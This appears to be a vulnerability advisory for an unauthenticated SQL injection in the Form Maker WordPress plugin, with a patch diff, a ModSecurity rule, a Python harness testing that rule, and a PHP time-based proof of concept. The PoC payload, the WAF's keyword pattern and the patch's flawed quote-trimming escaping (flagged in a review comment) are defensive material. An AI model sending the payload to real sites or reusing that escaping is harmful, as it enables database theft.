Atomic Edge analysis of CVE-2026-39502:
The Form Maker WordPress plugin version 1.15.38 and earlier contains an unauthenticated SQL injection vulnerability. This flaw exists in the frontend form submission processing logic, allowing attackers to inject malicious SQL payloads. The vulnerability carries a CVSS score of 7.5 (High severity), enabling information disclosure from the WordPress database.
Root Cause:
The vulnerability originates in the `form-maker/frontend/controllers/form_maker.php` file. The `form_maker` controller processes user-submitted form data and dynamically replaces placeholder tokens within SQL query parameters. At line 319 in the vulnerable version, the code directly replaces the `{input_id}` token with the raw user-supplied `$input_val` without proper sanitization. This unsanitized value is then incorporated into SQL queries executed by the plugin’s database layer, creating a classic SQL injection vector.
Exploitation:
Attackers exploit this vulnerability by submitting specially crafted form data to the plugin’s frontend submission endpoint. The payload uses the pipe-delimited format `input_id|injection_payload` where `injection_payload` contains SQL injection syntax. When the plugin processes this submission, it extracts the `input_val` portion and directly inserts it into SQL queries. An attacker could use UNION-based or time-based blind SQL injection techniques to extract sensitive data like user credentials, form submissions, or WordPress configuration details.
Patch Analysis:
The patch modifies lines 319-321 in `form-maker/frontend/controllers/form_maker.php`. Instead of directly replacing the token with raw user input, the patched code first passes `$input_val` through `$wpdb->prepare('%s', $input_val)`. This WordPress database function escapes the value and wraps it in single quotes for use as a SQL string literal. The patch then trims the surrounding single quotes added by `prepare()` using `trim(..., "'")` before performing the string replacement. This ensures all user input is escaped before inclusion in SQL queries, eliminating the injection vulnerability.
Impact:
Successful exploitation allows unauthenticated attackers to execute arbitrary SQL queries on the WordPress database. Attackers can extract sensitive information including WordPress user credentials (hashed passwords), personally identifiable information from form submissions, plugin configuration data, and other database contents. In multi-site installations, this could lead to compromise of all sites within the network. The vulnerability does not directly enable remote code execution or file system access.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/form-maker/form-maker.php
+++ b/form-maker/form-maker.php
@@ -3,7 +3,7 @@
* Plugin Name: Form Maker
* Plugin URI: https://10web.io/plugins/wordpress-form-maker/?utm_source=form_maker&utm_medium=free_plugin
* Description: This plugin is a modern and advanced tool for easy and fast creating of a WordPress Form. The backend interface is intuitive and user friendly which allows users far from scripting and programming to create WordPress Forms.
- * Version: 1.15.38
+ * Version: 1.15.39
* Author: 10Web Form Builder Team
* Author URI: https://10web.io/plugins/?utm_source=form_maker&utm_medium=free_plugin
* License: GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
@@ -26,8 +26,8 @@
public $plugin_url = '';
public $front_urls = array();
public $main_file = '';
- public $plugin_version = '1.15.38';
- public $db_version = '2.15.38';
+ public $plugin_version = '1.15.39';
+ public $db_version = '2.15.39';
public $menu_postfix = '_fm';
public $plugin_postfix = '';
public $handle_prefix = 'fm';
--- a/form-maker/frontend/controllers/form_maker.php
+++ b/form-maker/frontend/controllers/form_maker.php
@@ -316,7 +316,9 @@
list($input_id, $input_val) = explode('|', $val);
$str_key = '{'. $input_id .'}';
if ( strpos($params, $str_key) > -1 ) {
- $params = str_replace( $str_key, $input_val, $params );
+ // Escape for safe use inside SQL WHERE (params can end up in DB-backed choice queries).
+ $safe_val = trim( $wpdb->prepare( '%s', $input_val ), "'" );
+ $params = str_replace( $str_key, $safe_val, $params );
}
}
$html = $this->view->$type( $params, $row, $form_id, $row_id, $type, $param );
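Review bot: `trim( $wpdb->prepare( '%s', $input_val ), "'" )` strips every leading and trailing single quote, not only the pair that `prepare()` adds, so a value ending in a quote (which `prepare()` escapes as `\'`) comes back as `...\` with its escaped closing quote removed, and the backslash then escapes the query's own closing quote once the token is spliced back into `$params`. Remove exactly one character from each end instead, e.g. `$safe_val = substr( $wpdb->prepare( '%s', $input_val ), 1, -1 );`. Two further checks for this hunk: `$wpdb` is used but no `global $wpdb;` appears in the shown context, so confirm it is in scope in this method; and escaping only protects a `{input_id}` token that the resulting query wraps in single quotes, so any token placed in an unquoted numeric position still needs an explicit cast.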
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-39502
# Chain: admin-ajax.php request + form_maker_submit action + SQL keywords in form_data.
# The regex is matched after t:removeWhitespace, so keyword gaps use \s* rather than \s+.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:202639502,phase:2,deny,status:403,chain,msg:'CVE-2026-39502 SQL Injection via Form Maker plugin',severity:'CRITICAL',tag:'CVE-2026-39502',tag:'WordPress',tag:'Plugin/Form-Maker',tag:'attack.sql-injection'"
    SecRule ARGS_POST:action "@streq form_maker_submit" "chain"
    SecRule ARGS_POST:form_data "@rx \|.*(?:sleep\(\s*\d+\s*\)|benchmark\(|waitfor\s*delay|pg_sleep\(|union\s*(?:all\s*)?select|select.*from|insert\s*into|update.*set|delete\s*from|drop\s*table|create\s*table|exec\s*\(|--|#|/\*|\*/)" \
        "t:lowercase,t:urlDecodeUni,t:removeNulls,t:removeWhitespace"
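Added example (not part of the Atomic Edge page or the plugin): a small Python harness that approximates the rule's transformation chain and evaluates its `@rx` pattern over constructed `form_data` values, including the time-based payload from the PoC above and one benign sentence the keyword list still flags. `unquote_plus` stands in for `t:urlDecodeUni` and the sample values are made up for the test.

```python
import re
from urllib.parse import unquote_plus

# The @rx pattern from the WAF rule, as a raw string so the backslashes
# survive. ModSecurity evaluates it after the transformation chain.
FORM_DATA_SQLI = re.compile(
    r"\|.*(?:sleep\(\s*\d+\s*\)|benchmark\(|waitfor\s*delay|pg_sleep\(|"
    r"union\s*(?:all\s*)?select|select.*from|insert\s*into|update.*set|"
    r"delete\s*from|drop\s*table|create\s*table|exec\s*\(|--|#|/\*|\*/)"
)


def transform(value: str) -> str:
    """Approximate the rule's transformations, applied in the same order:
    t:lowercase, t:urlDecodeUni, t:removeNulls, t:removeWhitespace.
    unquote_plus is an assumption standing in for urlDecodeUni (no %uXXXX)."""
    value = value.lower()
    value = unquote_plus(value)
    value = value.replace("\x00", "")
    return re.sub(r"\s+", "", value)


def would_block(form_data: str) -> bool:
    """True when the chain's final SecRule matches this form_data value
    (assuming the REQUEST_URI and action checks earlier in the chain passed)."""
    return FORM_DATA_SQLI.search(transform(form_data)) is not None


# Constructed sample values for the form_data POST field (not real traffic).
SAMPLES = {
    "1|1' AND SLEEP(5)-- ": True,                   # time-based payload from the PoC
    "1|1%27%20union%20select%201%2C2--": True,      # same idea, URL-encoded
    "3|john.doe@example.com": False,                # ordinary field value
    "sleep(5) without a pipe": False,               # rule requires the input_id|value separator
    "5|Please select the blue one from the catalog": True,  # false positive: keyword hit
}


def check_samples() -> dict:
    """Run every sample through the rule; returns {value: (expected, actual)}."""
    return {v: (exp, would_block(v)) for v, exp in SAMPLES.items()}


if __name__ == "__main__":
    for value, (expected, actual) in check_samples().items():
        flag = "BLOCK" if actual else "pass "
        print(f"{flag} expected={expected!s:5} {value!r} -> {transform(value)!r}")
```

The last sample shows the cost of plain keyword matching: natural text containing `select ... from` is blocked too, which is the trade-off of a pattern this broad.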
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-39502 - Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder <= 1.15.38 - Unauthenticated SQL Injection

$target_url = "http://target-site.com/"; // Configure target URL

// The exploit targets form submissions processed by the vulnerable plugin
// This PoC demonstrates a time-based blind SQL injection payload
$payload = array(
    'form_data' => "1|1' AND SLEEP(5)-- ", // Pipe-delimited format: input_id|injection_payload
    'form_id'   => '1',                    // Valid form ID
    'action'    => 'form_maker_submit',    // Plugin AJAX action
    'nonce'     => ''                      // Nonce may not be required for unauthenticated exploitation
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, rtrim($target_url, '/') . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);

$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
$elapsed_time = $end_time - $start_time;

if ($elapsed_time >= 5) {
    echo "[+] Vulnerability confirmed! Response delayed by " . round($elapsed_time, 2) . " seconds.\n";
    echo "[+] The site is vulnerable to CVE-2026-39502.\n";
} else {
    echo "[-] No time delay detected. Site may be patched or payload failed.\n";
}
curl_close($ch);
?>